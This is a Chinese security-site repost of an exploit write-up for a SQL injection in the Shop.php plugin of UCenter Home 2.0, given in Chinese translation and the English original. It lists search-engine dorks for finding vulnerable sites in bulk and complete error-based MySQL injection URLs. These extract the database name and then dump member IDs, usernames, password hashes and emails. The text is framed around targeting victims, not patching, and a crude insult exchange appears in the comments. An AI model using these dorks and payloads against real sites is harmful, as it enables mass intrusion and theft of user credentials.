【漏洞】UCenter Home 2.0 SQL注入漏洞

admin 2021年4月3日19:02:32评论277 views字数 3266阅读10分53秒阅读模式

疑点解答:

    有人没找到“Shop.php”,“Shop.php”是一个商品点评插件,有的没有,有的有。所以这个应该是:插件注入。有点鸡肋,杀伤力不强!

    蓝色的是中文翻译,墨绿色的是英文原文。

作者: KnocKout 
感谢: DaiMon,BARCOD3,RiskY and iranian hackers 
联系: [email protected]  Cyber-Warrior.org/CWKnocKout 
脚本: UCenter Home 
版本: 2.0 
官网: http://u.discuz.net/ 
批量搜索1: Powered by UCenter inurl:shop.php?ac=view
批量搜索2: inurl:shop.php?ac=view&shopid=
缺陷文件: Shop.php 
利用方式: (?)ac=view&shopid= 
缺陷类型: SQL注入(基于MySQL的错误)
需要编码: 十六进制转换 

1,得到数据库名称

http://server/shop.php?ac=view&;shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

2,注入得到帐户密码信息

http://server/shop.php?ac=view&;shopid=253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

注入:
    http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 

数据库: 成功. 
编辑数据库 `[TARGET DB NAME]` 
例子: 'hiwir1_ucenter' 
编辑: 成功.
 
你需要使用十六进制的转换,并编辑您的SQL注入漏洞。
  
利用代码:
    http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

*/Author : KnocKout 
*/Greatz : DaiMon,BARCOD3,RiskY and iranian hackers 
*/Contact: [email protected] 
*/Cyber-Warrior.org/CWKnocKout 
===================================================
Script: UCenter Home 
Version: 2.0 
Script HomePage: http://u.discuz.net/ 
===================================================
Dork: Powered by UCenter inurl:shop.php?ac=view 
Dork 2: inurl:shop.php?ac=view&shopid= 
===================================================
Vuln file: Shop.php 
value's: (?)ac=view&shopid= 
Vulnerable Style: SQL Injection (MySQL Error Based) 
Need Metarials: Hex Conversion 
===================================================

Your Need victim Database name.  
for Inject:
    http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 
DB: Okey. 
your edit DB `[TARGET DB NAME]` 
Example: 'hiwir1_ucenter' 
Edit: Okey. 
Your use Hex conversion. And edit Your SQL Injection Exploit.. 
  
Exploit Code:
    http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

留言评论(旧系统):

佚名 @ 2014-05-13 13:55:55

擦你妹夫

本站回复:

擦你姨夫

文章来源于lcx.cc:【漏洞】UCenter Home 2.0 SQL注入漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年4月3日19:02:32
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【漏洞】UCenter Home 2.0 SQL注入漏洞http://cn-sec.com/archives/319693.html

发表评论

匿名网友 填写信息